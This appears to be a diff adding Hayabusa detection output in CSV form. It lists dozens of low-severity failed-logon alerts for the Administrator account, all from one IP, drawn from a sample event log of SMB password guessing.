+2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmiHIQrpsAVRJtdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4TdkChjMAviJ6jr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPIGU1rBk0F5cG9P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ScynGWKK3CtoUsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0E4JAuxC8MuuGfnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4aDJtqsUWKyuDqBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCFrEHUgqCtKPybS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ftrEBfaLGbboV8D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: thle3slH6gZYllyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PcEnabS7oj98WI0e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EBqGp9CD4A9PsyLk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iil8dQlzMCkKRNUb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nDBqxF9bmNNjNdsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJNBRV3BRVEN8hmG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OGl1Tbdw7PDvVsRR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uspHTc4JwnjjZQti | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Exq3nfy1LeFOPcA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vdFC4g7vsLO0zOzL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HpdCohLheoqQ6DXw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHS3sclMwgHuH8rE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sNSheImuQwgOEH5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GX5y374mlYYXbAB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaFRL6q9KQY5bFHZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrkEyJmfLiSrvQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fd1vJiJa3pdjqdQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RVrZl3LOIa7VLhT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TKR8KbyQkwRX1qTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GY22XuDxbE5lvEra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4AntiX3j9HLHcOOq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIvMbod41WeNADy5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0UL4lb3CCrv7YfGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OyRktDjPqFyrdSTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKEGmAH8Wbc7f3jC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06Dfi4lO2Vdw3gCr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29eXmenUTACkAHKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Zq7Gl6hnKDJJqFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jKENlWYt6m78taZR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 822SUU2Hg6w6AqQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bROU0Mk9Z4yEq323 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKfVPleDpLLqkuKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NGWVqbchMitnLVYT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7K9vifU9lWwpP9J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIgKYj210JfICJXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jisuKilPQivTV8yE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hckyoom0XnqpRzK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: De0l6qgcuhMERjMY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SSa7pylPWn8jl2Ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ol9OntO4hqidlNUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kXOBF0ZWLxMauHuT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVBFJltkR5vnmpYD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kHVXEHq9zNYdfTpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OIw3BxmLsfwDXXFg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hhgRhjnhkRJus4fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xz78guWXrekEvuFT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 04wNT26RJmriQrfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XmbuuymdSpfNldt2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yqJarBVOImq5Tn2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BZYExQroYH65tPuG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llU5DQBrIrV3VtG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HV17iXOYQqs2ntax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esZnEeyGdPa22PsL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rlYFTP9a2wdi5A2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJifU0PnO1Ntp6z3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGKdKjJy28Qd1whT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3L4BYjYJYlvuYHE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ui5RoLKttDo0wfFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G2xjdWobsxBjo6p7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TPeQ0M5lXITI84G3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uu72qx4lG5ZRM7xf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zD072YR1hIgbzjaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqA7HDvImIlCiFq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: efYFxZwMGEC3vVi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6WmMHYegvFJvv6zd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DS9WkRnP0B5MgaeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
